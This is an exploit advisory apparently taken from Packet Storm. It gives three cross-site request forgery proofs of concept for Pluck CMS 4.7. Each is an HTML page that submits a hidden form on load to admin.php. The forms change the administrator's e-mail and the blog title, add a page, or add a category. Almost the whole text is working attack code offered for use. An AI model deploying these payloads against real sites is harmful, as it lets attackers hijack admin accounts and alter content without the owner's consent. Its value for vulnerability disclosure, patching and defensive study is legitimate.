Pluck CMS 4.7 Cross Site Request Forgery

2012-02-10T00:00:00
ID PACKETSTORM:109632
Type packetstorm
Reporter Gordon Security
Modified 2012-02-10T00:00:00

Description

                                        
                                            `# Exploit Title: Pluck cms multiple vulnerabilit�  
# Date: 09/01/2012  
# Author: Gordon Security  
# Vendor or Software Link: www.pluck-cms.org  
# Version: 4.7  
# Category: webapps  
# Website:www.gordon-security.blogspot.com  
C.S.R.F. #1  
#[p.o.c.] Change admin e-mail and change title blog  
<html>  
<title>Gordon Security</title>  
<body onload="javascript:document.  
forms[0].submit()">  
<H3>www.gordon-security.blogspot.com</H3>  
<H2>CSRF Exploit to change Admin E-mail and Blog Title</H2>  
<form method="POST" name="form0" action="  
http://127.0.0.1:80/pluck/admin.php?action=settings<http://127.0.0.1/pluck/admin.php?action=settings>  
">  
<input type="hidden" name="cont1" value="Gordon Security"/>  
<input type="hidden" name="cont2" value="gordon_@hotmail.it"/>  
<input type="hidden" name="save" value="Salva"/>  
</form>  
</body>  
</html>  
C.S.R.F. #2  
#[p.o.c.] Add page to blog  
<html>  
<title>Gordon Security</title>  
<body onload="javascript:document.forms[0].submit()">  
<H3>www.gordon-security.blogspot.com</H3>  
<H2>CSRF Exploit to add page</H2>  
<form method="POST" name="form0" action="  
http://127.0.0.1:80/pluck/admin.php?action=editpage<http://127.0.0.1/pluck/admin.php?action=editpage>  
">  
<input type="hidden" name="title" value="Exploit"/>  
<input type="hidden" name="content" value="<p>Exploited</p>"/>  
<input type="hidden" name="description" value=""/>  
<input type="hidden" name="keywords" value=""/>  
<input type="hidden" name="hidden" value="no"/>  
<input type="hidden" name="sub_page" value=""/>  
<input type="hidden" name="theme" value="default"/>  
<input type="hidden" name="save_exit" value="Save and Exit"/>  
</form>  
</body>  
</html>  
C.S.R.F #3  
#[p.o.c.] Add categorie  
<html>  
<title>Gordon Security</title>  
<body onload="javascript:document.forms[0].submit()">  
<H3>www.gordon-security.blogspot.com</H3>  
<H2>CSRF Exploit to add categorie</H2>  
<form method="POST" name="form0" action="  
http://127.0.0.1:80/pluck/admin.php?module=blog<http://127.0.0.1/pluck/admin.php?module=blog>  
">  
<input type="hidden" name="cont1" value="Hacking"/>  
<input type="hidden" name="Submit" value="Salva"/>  
</form>  
</body>  
</html>  
  
  
  
`